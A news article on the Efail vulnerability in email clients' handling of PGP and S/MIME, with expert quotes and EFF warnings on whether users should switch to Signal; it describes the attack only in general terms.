Security experts are at odds over how to respond to new research showing hackers could decrypt emails that were supposed to be protected by a popular encryption tool known as PGP, or Pretty Good Privacy.
A group of European researchers on Monday revealed a flaw in the way certain email programs handle PGP and S/MIME, a similar encryption protocol commonly used by businesses and other enterprises, as my colleague Brian Fung and I reported yesterday.
The discovery of the flaw, dubbed Efail, blew open a rift between defenders of PGP who insist the encryption is sound — and others who say it’s time to move away from the 30-year-old technology in favor of encrypted messaging apps such as Signal.
“This whole PGP infrastructure is kind of a mess and needs to be hardened up and fixed, or we need to start using something better,” Matt Green, a cryptography expert and assistant professor at Johns Hopkins University, told me. “Signal, Wired and other encrypted chat applications aren’t vulnerable the way PGP is. They’re not only more secure, they’re more widely used.”
PGP has been the gold standard for encrypting emails since it was released in 1991. But today, people want the convenience of using their smartphones. And encrypted apps are more widely available than ever.
With the discovery of this flaw, it’s a good time to make the switch, tweeted Barton Gellman, a senior fellow at the Century Foundation and former Washington Post reporter who covered the National Security Agency leaks by Edward Snowden:
I'm against defeatism. I'd say "possibly not." And that assumes you're targeted by a proficient adversary. Journalists, activists, political opposition should take extra care. Large majority of people would get much more privacy out of GPG than not, and certainly from Signal. twitter.com/NickOchsnerWBT…The best advice TBH is just to stop using GPG / PGP (for most purposes) and start using Signal. Safer, easier, free, works on your phone at least as well as on a computer. Messages, attachments, audio or video calls. Just get it. signal.org
Yet the flaw isn’t in PGP itself but in the way certain email programs handle it. Researchers said affected email applications include Mozilla Thunderbird, Apple Mail and some versions of Outlook. (A full list is available from the researchers' report.)
The vulnerability allows hackers to read an encrypted email by making changes to its HTML, which essentially tricks the affected email applications into decrypting the rest of the message. To do this, a hacker would need access to the victim’s encrypted emails — for example, by snooping on network traffic or otherwise compromising email accounts.
Green explains it simply: “The attacker can modify the encrypted email, and when the person for whom it’s intended opens it or previews it, the mail program will send the contents out to a remote server the attacker has set up,” he said. “All you have to do is look at it and it will decrypt itself and send it out to the attacker.”
This could put whistle blowers, political activists and others who depend on encrypted email at risk, the researchers said in a blog post. That added urgency to warnings from the digital rights group Electronic Frontier Foundation, which urged users of the affected email programs to immediately disable tools that allow the email apps to use PGP or S/MIME.
“Until the flaws described in the paper are more widely understood and fixed," EFF said, "users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email."
But some security experts said these dire warnings were overkill.
